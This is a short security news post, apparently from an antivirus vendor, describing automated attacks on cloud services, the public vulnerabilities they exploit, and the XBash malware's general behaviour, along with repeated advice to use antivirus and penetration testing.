Sadly we have bad news for today! Hackers are increasingly targeting vulnerable cloud infrastructure to exploit it for covert crypto jacking or to deliver ransomware.
From this huge number of cyber attacks some are trivial and almost not dangerous, but others are done with multi-vector or multi-platform threats that have multiple functionalities from crypto mining to ransomware and botnet or worm activity.
Cybersecurity researchers have found that most of the attacks are fully automated. At first, a dangerous cyber attack will probe the infrastructure and cloud services for vulnerabilities and weak or default login credentials.
During an investigation it was discovered that the most used ways to get in are:
• An unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API
• A Redis remote command execution bug
• CVE-2016-3088, an ActiveMQ arbitrary file execution flaw.
Remember everything can be hacked. In order to stay away from any threats related to the cyber world, we recommend the install of antivirus for Windows or antivirus for Mac on every device that you own, depending on which OS your device is running. If you are a company, it is also recommended to hire every year a specialized cybersecurity company that will run annual tests on your company’s network. These tests include penetration testing and ethical hacking tests;
The main focus of this cyber attacks is to install a second-stage malware that is rather a crypto mining one or a remote access one.
In some cases, the same malware will move unilaterally through the infected network to expose services, remove data, or install ransomware.
The persistence is obtained by using cronjob entries on Linux and malicious startup items on Windows systems. If all goes well the hackers C&C servers will then deliver additional malware, username/password lists, and s.o.
One of the most prolific malware used is XBash – an advanced malware that is leveraging many threat behaviors.
Be aware! This threat infects both Linux and Windows systems! It installs crypto jacking scripts and it also spreads through the network by brute-forcing the weak passwords configured on the various services.
If a database service is breached, it will then delete the existing databases and creates a new one with a ransom note specifying the amount and the bitcoin wallet.
Cybersecurity experts are advising both companies and individuals to continuously review their cloud infrastructure services that are connected to the internet and to restrict access as much as possible;
We would continue to monitor this cybersecurity problem. Meanwhile, users should keep a keen eye out for any cyber attacks. Remember to use an antivirus for Windows or antivirus for Mac in every device that you own, depending on which OS your machine is running, If you are a company we recommend to hire every year a specialized cybersecurity company that will run annual tests on your company’s network, tests like this include: penetration testing and ethical hacking.